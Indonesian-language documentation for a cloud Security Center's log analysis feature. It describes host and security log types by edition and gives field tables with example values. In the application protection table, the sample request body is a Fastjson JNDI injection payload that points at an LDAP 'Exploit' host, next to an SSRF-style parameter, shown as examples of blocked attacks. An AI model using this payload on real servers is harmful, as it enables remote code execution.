Fitur analisis log Pusat Keamanan menyediakan penyimpanan terpusat, kueri, dan analisis aktivitas host serta event keamanan untuk mendukung audit keamanan, pelacakan event, dan deteksi ancaman. Topik ini menjelaskan jenis log yang didukung oleh Pusat Keamanan, perbedaan antar edisi, field log, serta menyediakan contoh kueri.
Dukungan versi
Langganan
Log host
Kategorisasi log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Log keamanan
Kategorisasi log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Catatan Hanya alert yang didukung oleh edisi Basic yang direkam. | ||||
Vulnerability logs | Catatan Hanya kerentanan yang didukung oleh edisi Basic yang direkam. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Log layanan bernilai tambah
Jika Anda mengaktifkan layanan bernilai tambah berikut, Pusat Keamanan dapat menganalisis log yang dihasilkannya.
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check logs and CSPM logs)
Layanan bayar sesuai penggunaan
Jika Anda membeli layanan bayar sesuai penggunaan Host and Container Security, jenis log yang didukung bervariasi tergantung pada tingkat perlindungan yang ditautkan ke server.
Log host
Kategorisasi log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Log keamanan
Kategorisasi log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Catatan Hanya alert yang didukung untuk level Unprotected yang direkam. | |||
Vulnerability logs | Catatan Hanya kerentanan yang tidak dicakup oleh tingkat perlindungan yang direkam. | |||
Network defense logs | ||||
Core file monitoring event logs |
Log Layanan Bayar Sesuai Penggunaan
Jika Anda mengaktifkan layanan bayar sesuai penggunaan berikut, Pusat Keamanan dapat menganalisis log yang dihasilkannya.
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check logs and CSPM logs)
Deskripsi jenis log
Contoh log dan deskripsi field berikut hanya untuk referensi. Field spesifik dapat berubah seiring pembaruan produk. Untuk informasi paling akurat, rujuk data yang dikumpulkan di Simple Log Service.
Log Host
__topic__:
aegis-log-loginIsi log: Mencatat event login pengguna di server, termasuk alamat IP sumber, username, dan hasil login.
Deskripsi: Membantu Anda memantau aktivitas pengguna dan segera mengidentifikasi serta merespons perilaku abnormal.
PentingPusat Keamanan tidak mendukung pengumpulan logon logs untuk sistem operasi Windows Server 2008.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-networkIsi log: Mencatat aktivitas koneksi jaringan di server secara real-time, termasuk informasi seperti 5-tuple koneksi dan proses terkait.
Deskripsi: Membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi potensi serangan jaringan, dan mengoptimalkan kinerja jaringan.
PentingServer hanya mengumpulkan beberapa status koneksi dari pembentukan hingga terminasi.
Trafik inbound tidak direkam.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-processIsi log: Mencatat event startup semua proses baru di server, termasuk informasi seperti nama proses, parameter command-line, dan proses induk.
Deskripsi: Membantu Anda memahami status startup dan konfigurasi proses dalam sistem serta mendeteksi masalah seperti aktivitas proses abnormal, intrusi malware, dan ancaman keamanan.
Periode pengumpulan: Real-time. Log dilaporkan segera setelah proses dimulai.
__topic__:
aegis-log-crackIsi log: Mencatat perilaku serangan brute-force, termasuk upaya login dan cracking terhadap sistem, aplikasi, atau akun.
Deskripsi: Membantu Anda mengidentifikasi serangan brute-force, mendeteksi login abnormal, kata sandi lemah, dan kebocoran kredensial. Log ini juga mendukung respons insiden dan analisis forensik.
Periode pengumpulan: Real-time.
__topic__:
aegis-snapshot-hostIsi log: Mencatat informasi detail tentang akun pengguna dalam sistem atau aplikasi, termasuk properti dasar akun seperti username, kebijakan kata sandi, dan riwayat login.
Deskripsi: Dengan membandingkan snapshot dari waktu yang berbeda, Anda dapat memantau perubahan akun dan segera mendeteksi masalah keamanan seperti akses tidak sah dan status akun abnormal.
Periode pengumpulan: Data dikumpulkan secara otomatis pada interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-snapshot-portIsi log: Mencatat informasi koneksi jaringan, termasuk 5-tuple koneksi, status koneksi, dan proses terkait.
Deskripsi: Membantu Anda memahami koneksi jaringan aktif dalam sistem, menemukan perilaku koneksi abnormal, dan mengidentifikasi potensi serangan jaringan.
Periode pengumpulan: Data dikumpulkan secara otomatis pada interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-snapshot-processIsi log: Mencatat aktivitas proses dalam sistem, termasuk ID proses, nama, dan waktu startup.
Deskripsi: Gunakan log ini untuk memahami aktivitas proses dan penggunaan sumber daya, serta mendeteksi masalah seperti proses abnormal, penggunaan CPU tinggi, dan kebocoran memori.
Periode pengumpulan: Data dikumpulkan secara otomatis pada interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-log-dns-queryIsi log: Mencatat permintaan kueri DNS yang diprakarsai oleh server, termasuk informasi seperti nama domain yang dikueri, tipe kueri, dan sumber.
PentingPengumpulan log tidak didukung untuk server Linux dengan versi kernel lebih awal dari 4.X.X.
Deskripsi: Gunakan log ini untuk menganalisis aktivitas DNS dan mendeteksi masalah seperti kueri abnormal, pembajakan domain, dan polusi DNS.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-clientIsi log: Mencatat event online dan offline agen Pusat Keamanan.
Deskripsi: Membantu Anda memantau status berjalan agen Pusat Keamanan.
Periode pengumpulan: Real-time.
Log keamanan
Semua log keamanan dikumpulkan secara real-time.
__topic__:
sas-vul-logIsi log: Mencatat informasi tentang kerentanan yang ditemukan dalam sistem atau aplikasi Anda, termasuk nama kerentanan, status, dan tindakan penanganan.
Deskripsi: Membantu Anda memahami kerentanan, risiko keamanan, dan tren serangan dalam sistem sehingga Anda dapat mengambil langkah remediasi tepat waktu.
__topic__:
sas-hc-logIsi log: Mencatat hasil pemeriksaan risiko baseline, termasuk informasi seperti level baseline, kategori, dan level risiko.
PentingHanya data untuk item pemeriksaan yang gagal pertama kali yang direkam. Data untuk item pemeriksaan yang sebelumnya lulus tetapi sekarang gagal dalam pemeriksaan baru juga direkam.
Deskripsi: Membantu Anda memahami status keamanan baseline dan potensi risiko dalam sistem Anda.
__topic__:
sas-security-logIsi log: Mencatat event dan alert keamanan yang terjadi dalam sistem atau aplikasi Anda, termasuk sumber data alert, detail, dan level alert.
Deskripsi: Membantu Anda memahami event dan ancaman keamanan dalam sistem sehingga Anda dapat mengambil langkah respons yang sesuai.
CSPM - Cloud platform configuration check logs
__topic__:
sas-cspm-logIsi log: Mencatat informasi seperti hasil pemeriksaan konfigurasi platform cloud dan operasi daftar putih.
Deskripsi: Membantu Anda memahami masalah konfigurasi dan potensi risiko keamanan dalam platform cloud Anda.
__topic__:
sas-net-blockIsi log: Mencatat event serangan jaringan, termasuk informasi penting seperti tipe serangan dan alamat IP sumber/tujuan.
Deskripsi: Membantu Anda memahami event keamanan pada jaringan Anda sehingga Anda dapat mengambil langkah respons dan pertahanan untuk meningkatkan keamanan jaringan.
__topic__:
sas-rasp-logIsi log: Mencatat informasi alert serangan dari Runtime Application Self-Protection (RASP), termasuk tipe serangan, data perilaku, dan alamat IP penyerang.
Deskripsi: Membantu Anda memahami event keamanan dalam aplikasi Anda sehingga Anda dapat mengambil langkah respons dan pertahanan untuk meningkatkan keamanan aplikasi.
Topic:
sas-filedetect-logIsi log: Mencatat hasil deteksi dari kit pengembangan perangkat lunak (SDK) deteksi malware, termasuk informasi file, skenario deteksi, dan hasil.
Deskripsi: Membantu Anda mengidentifikasi dan segera menangani program berbahaya dalam file offline atau penyimpanan cloud.
Core file monitoring event logs
Topic:
aegis-file-protect-logIsi log: Mencatat event alert yang dideteksi oleh fitur pemantauan file inti, termasuk path file, tipe operasi, dan level alert.
Deskripsi: Membantu Anda memantau apakah file inti dicuri atau dirusak.
__topic__:
sas-agentless-logIsi log: Mencatat risiko keamanan yang terdeteksi di server cloud, snapshot disk, dan image. Risiko ini mencakup kerentanan, baseline, sampel berbahaya, dan file sensitif.
Deskripsi: Membantu Anda melihat status risiko keamanan aset Anda selama periode waktu yang berbeda untuk mengidentifikasi dan merespons potensi ancaman.
Field log host
Logon logs
Nama bidang | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | Alamat IP server yang akan dilogin. | 221.11.XX.XX |
dst_port | Port login server. | 22 |
login_type | Tipe login. Nilai valid meliputi tetapi tidak terbatas pada:
| SSH |
username | Username login. | admin |
login_count | Jumlah login. Login berulang dalam satu menit digabung menjadi satu entri log. Misalnya, jika nilai | 3 |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Network connection logs
Nama field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks untuk mencari rantai proses. | B184 |
container_hostname | Nama server dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses dalam kontainer. | 0 |
net_connect_dir | Arah koneksi jaringan. Nilai valid:
| in |
dst_ip | Alamat IP penerima koneksi jaringan.
| 192.168.XX.XX |
dst_port | Port penerima koneksi jaringan. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_proc_name | Nama file proses induk. | /usr/bin/bash |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_name | Nama proses. | nginx |
proc_path | Path proses. | /usr/local/nginx/sbin/nginx |
proc_start_time | Waktu startup proses. | N/A |
connection_type | Protokol. Nilai valid:
| tcp |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41897 |
srv_comm | Nama perintah yang terkait dengan proses kakek. | containerd-shim |
status | Status koneksi jaringan. Nilai valid:
| 5 |
type | Tipe koneksi jaringan real-time. Nilai valid:
| listen |
uid | ID pengguna proses. | 101 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Process startup logs
Nama Field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks untuk mencari rantai proses. | B184 |
cmd_index | Indeks setiap parameter dalam command line. Setiap pasangan indeks menunjukkan awal dan akhir parameter. | 0,3,5,8 |
cmdline | Command line lengkap untuk memulai proses. | ipset list KUBE-6-CLUSTER-IP |
comm | Nama perintah yang terkait dengan proses. | N/A |
container_hostname | Nama server dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama image. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses dalam kontainer. | 0 |
cwd | Direktori tempat proses berjalan. | N/A |
proc_name | Nama file proses. | ipset |
proc_path | Path lengkap file proses. | /usr/sbin/ipset |
gid | ID grup proses. | 0 |
groupname | Grup pengguna. | group1 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_cmd_line | Command line proses induk. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | Nama file proses induk. | kube-proxy |
parent_proc_path | Path lengkap file proses induk. | /usr/local/bin/kube-proxy |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_start_time | Waktu startup proses. | 2024-08-01 16:45:40 |
parent_proc_start_time | Waktu startup proses induk. | 2024-07-12 19:45:19 |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
srv_cmd | Baris perintah dari proses kakek. | /usr/bin/containerd |
tty | Terminal login. N/A menunjukkan bahwa akun belum pernah login ke terminal. | N/A |
uid | ID pengguna. | 123 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Brute-force attack logs
Nama field | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang menjadi sasaran serangan brute-force. | 192.168.XX.XX |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
uuid | UUID server yang menjadi sasaran serangan brute-force. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | Jumlah login gagal. Login berulang dalam satu menit digabung menjadi satu entri log. Misalnya, jika nilai | 3 |
src_ip | Alamat IP sumber untuk login. | 47.92.XX.XX |
dst_port | Port login. | 22 |
login_type | Tipe login. Nilai valid:
| SSH |
username | Username login. | user |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Account snapshot logs
Nama Bidang | Deskripsi | Contoh |
account_expire | Waktu kedaluwarsa akun. never menunjukkan bahwa akun tidak pernah kedaluwarsa. | never |
domain | Domain atau layanan direktori tempat akun tersebut berada. N/A menunjukkan bahwa akun tidak termasuk dalam domain apa pun. | N/A |
groups | Grup tempat akun tersebut berada. N/A menunjukkan bahwa akun tidak termasuk dalam grup apa pun. | ["nscd"] |
home_dir | Direktori home. Ini adalah lokasi default untuk menyimpan dan mengelola file dalam sistem. | /Users/abc |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
last_chg | Tanggal terakhir kata sandi diubah. | 2022-11-29 |
last_logon | Tanggal dan waktu login terakhir ke akun. N/A menunjukkan bahwa akun belum pernah dilogin. | 2023-08-18 09:21:21 |
login_ip | Alamat IP remote login terakhir ke akun. N/A menunjukkan bahwa akun belum pernah dilogin. | 192.168.XX.XX |
passwd_expire | Tanggal kedaluwarsa kata sandi. never menunjukkan bahwa kata sandi tidak pernah kedaluwarsa. | 2024-08-24 |
perm | Menunjukkan apakah akun memiliki izin root. Nilai valid:
| 0 |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
shell | Perintah shell Linux. | /sbin/nologin |
status | Status akun pengguna. Nilai valid:
| 0 |
tty | Terminal login. N/A menunjukkan bahwa akun belum pernah login ke terminal. | N/A |
username | Username. | nscd |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | Tanggal pengingat kedaluwarsa kata sandi. never menunjukkan bahwa pengingat tidak pernah dikirim. | 2024-08-20 |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Network snapshot logs
Nama field | Deskripsi | Contoh |
net_connect_dir | Arah koneksi jaringan. Nilai valid: in — inbound. | in |
dst_ip | Alamat IP peer, umumnya kosong. | |
dst_port | Port penerima koneksi jaringan. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
pid | ID proses. | 682 |
proc_name | Nama proses. | sshd |
connection_type | Protokol. Nilai valid:
| tcp4 |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
src_ip | Alamat IP lokal. | 100.127.XX.XX |
src_port | Port yang mendengarkan. | 41897 |
status | Nilai 2 menunjukkan bahwa port sedang mendengarkan (listen), dan src_ip/src_port terkait merepresentasikan alamat yang mendengarkan. | 5 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Process snapshot logs
Nama Field | Deskripsi | Contoh |
cmdline | Command line lengkap untuk memulai proses. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
md5 | Hash MD5 file biner. Catatan Hash MD5 tidak dihitung untuk file proses yang lebih besar dari 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | Nama file proses. | assist_daemon |
proc_path | Path lengkap file proses. | /usr/local/share/assist-daemon/assist_daemon |
pid | ID proses. | 1692 |
pname | Nama file proses induk. | systemd |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
proc_start_time | Waktu startup proses. Ini adalah field bawaan. | 2023-08-18 20:00:12 |
uid | ID pengguna proses. | 101 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
DNS query logs
Nama Bidang | Deskripsi | Contoh |
domain | Nama domain yang sesuai dengan kueri DNS. | example.aliyundoc.com |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang memprakarsai kueri DNS. | 192.168.XX.XX |
pid | ID proses yang memprakarsai kueri DNS. | 3544 |
ppid | ID proses induk yang memprakarsai kueri DNS. | 3408 |
cmd_chain | Rantai proses yang memprakarsai kueri DNS. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | Command line yang memprakarsai kueri DNS. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | Path proses yang memprakarsai kueri DNS. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
time | Waktu ketika event kueri DNS ditangkap. Waktu ini umumnya sama dengan waktu ketika kueri DNS terjadi. | 2023-08-17 20:05:04 |
uuid | UUID server yang memprakarsai kueri DNS. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Client event logs
Nama Bidang | Deskripsi | Contoh |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
agent_version | Versi klien | aegis_11_91 |
last_login | Timestamp login terakhir. Satuan: milidetik. | 1716444387617 |
platform | Tipe sistem operasi. Nilai valid:
| linux |
region_id | ID wilayah tempat server berada. | cn-beijing |
status | Status agen. Nilai valid:
| online |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Field log keamanan
Vulnerability logs
Nama Field | Deskripsi | Contoh |
vul_alias_name | Alias kerentanan. | CESA-2023:1335: openssl Security Update |
risk_level | Level risiko. Nilai valid:
| later |
extend_content | Informasi tambahan tentang kerentanan. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
instance_name | Hostname. | hhht-linux-*** |
vul_name | Nama kerentanan. | centos:7:cesa-2023:1335 |
operation | Tindakan yang dilakukan pada kerentanan. Nilai valid:
| new |
status | Status. Nilai valid:
| 1 |
tag | Tag kerentanan. Nilai valid:
| oval |
type | Tipe kerentanan. Nilai valid:
| sys |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
CSPM - Baseline check logs
Nama field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Setel interval minimum untuk perubahan kata sandi |
check_item_level | Level pemeriksaan baseline. Nilai valid:
| medium |
check_type | Tipe item pemeriksaan. | Otentikasi identitas |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
risk_level | Level risiko item risiko. Nilai valid:
| medium |
operation | Operasi. Nilai valid:
| new |
risk_name | Nama item risiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
sas_group_name | Grup aset server tempat item risiko terdeteksi di Pusat Keamanan. | default |
status | Status. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtipe. | Praktik terbaik keamanan internasional - Pemeriksaan baseline keamanan Ubuntu 16/18/20/22 |
sub_type_name | Nama subtipe baseline. Untuk informasi lebih lanjut tentang nilai valid subtipe baseline, lihat Daftar tipe dan subtipe baseline. | hc_ubuntu16_cis_rules |
type_alias_name | Alias tipe. | Praktik terbaik keamanan internasional |
type_name | Tipe baseline. Untuk nilai valid tipe baseline, lihat Daftar tipe dan subtipe baseline. | cis |
uuid | UUID server tempat item risiko terdeteksi. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Security alert logs
Nama field | Deskripsi | Contoh |
data_source | Sumber data. Nilai valid:
| aegis_login_log |
detail | Objek JSON yang memberikan konteks detail untuk alert. Field dalam objek ini bervariasi berdasarkan tipe alert. Berikut menjelaskan field umum objek
| {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
level | Level risiko event alert. Nilai valid:
| suspicious |
name | Nama alert. | Anomalous Logon - Unusual Account Logon to ECS |
operation | Operasi. Nilai valid:
| new |
status | Status alert. Nilai valid:
| 1 |
unique_info | Pengenal unik alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | UUID server yang menghasilkan alert. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
suspicious_event_id | ID event peringatan. | 650226318 |
handle_time | Waktu yang sesuai dengan operasi. | 1765272845 |
alert_first_time | Waktu pertama kali alert terjadi. | 1764226915 |
alert_last_time | Waktu terakhir alert terjadi. | 1765273425 |
strict_mode | Menunjukkan apakah alert merupakan alert mode ketat. Nilai valid: true, false. | true |
user_id | ID akun. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Nama field | Deskripsi | Contoh |
check_id | ID item pemeriksaan. Anda dapat memanggil operasi ListCheckResult untuk mendapatkan ID. | 11 |
check_item_name | Nama item pemeriksaan. | Konfigurasi pengambilan origin |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
instance_name | Nama instans. | lsm |
instance_result | Dampak risiko. Nilainya berupa string JSON. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | Subtipe instans. Nilai valid:
| INSTANCE |
instance_type | Tipe instans. Nilai valid:
| ECS |
region_id | ID wilayah tempat instans berada. | cn-hangzhou |
requirement_id | ID persyaratan. Anda dapat memanggil operasi ListCheckStandard untuk mendapatkan ID. | 5 |
risk_level | Level risiko. Nilai valid:
| MEDIUM |
section_id | ID bagian. Anda dapat memanggil operasi ListCheckResult untuk mendapatkan ID. | 1 |
standard_id | ID standar. Anda dapat memanggil operasi ListCheckStandard untuk mendapatkan ID. | 1 |
status | Status item pemeriksaan. Nilai valid:
| PASS |
vendor | Penyedia layanan cloud. Nilainya tetap ALIYUN. | ALIYUN |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu ketika event terjadi. | 1719472214 |
Network defense logs
Nama Field | Deskripsi | Contoh |
cmd | Command line proses yang diserang. | nginx: master process nginx |
cur_time | Waktu ketika event serangan terjadi. | 2023-09-14 09:21:59 |
decode_payload | Payload yang dikonversi dari format HEX ke karakter. | POST /Services/FileService/UserFiles/ |
dst_ip | Alamat IP aset yang diserang. | 172.16.XX.XX |
dst_port | Port aset yang diserang. | 80 |
func | Tipe event yang dicegat. Nilai valid:
| payload |
rule_type | Tipe aturan spesifik event yang dicegat. Nilai valid:
| alinet_payload |
instance_id | ID instans aset yang diserang. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset yang diserang. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset yang diserang. | 192.168.XX.XX |
final_action | Pola tindakan pertahanan. Nilai: block (dicegat). | block |
payload | Payload dalam format HEX. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | ID proses yang diserang. | 7107 |
platform | Tipe sistem aset yang diserang. Nilai valid:
| linux |
proc_path | Path proses yang diserang. | /usr/sbin/nginx |
sas_group_name | Grup aset server di Pusat Keamanan. | default |
src_ip | Alamat IP sumber serangan. | 106.11.XX.XX |
src_port | Port sumber yang memprakarsai serangan. | 29575 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan kapan event terjadi. | 1719472214 |
Application protection logs
Nama Bidang | Deskripsi | Contoh |
app_dir | Direktori tempat aplikasi berada. | /usr/local/aegis/rasp/apps/1111 |
app_id | ID aplikasi. | 6492a391fc9b4e2aad94**** |
app_name | Nama aplikasi. | test |
confidence_level | Tingkat kepercayaan algoritma deteksi. Nilai valid:
| low |
request_body | Badan permintaan. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | Panjang badan permintaan. | 112 |
data | Parameter titik hook. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | Header permintaan. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | Nama host atau perangkat jaringan. | testhostname |
host_ip | Alamat IP pribadi host. | 172.16.XX.XX |
is_cliped | Menunjukkan apakah log dipotong karena terlalu panjang. Nilai valid:
| false |
jdk_version | Versi JDK. | 1.8.0_292 |
message | Deskripsi alert. | Unsafe class serial. |
request_method | Metode permintaan. | Post |
platform | Tipe sistem operasi. | Linux |
arch | Arsitektur sistem operasi. | amd64 |
kernel_version | Versi kernel sistem operasi. | 3.10.0-1160.59.1.el7.x86_64 |
param | Parameter permintaan. Format umum meliputi:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | Payload serangan efektif. | bash -c kill -0 -- -'31098' |
payload_length | Panjang payload serangan. | 27 |
rasp_id | ID unik probe perlindungan aplikasi. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | Versi probe perlindungan aplikasi. | 0.8.5 |
src_ip | Alamat IP peminta. | 172.0.XX.XX |
final_action | Hasil penanganan alert. Nilai valid:
| block |
rule_action | Metode penanganan alert yang ditentukan oleh aturan. Nilai valid:
| block |
risk_level | Level risiko. Nilai valid:
| high |
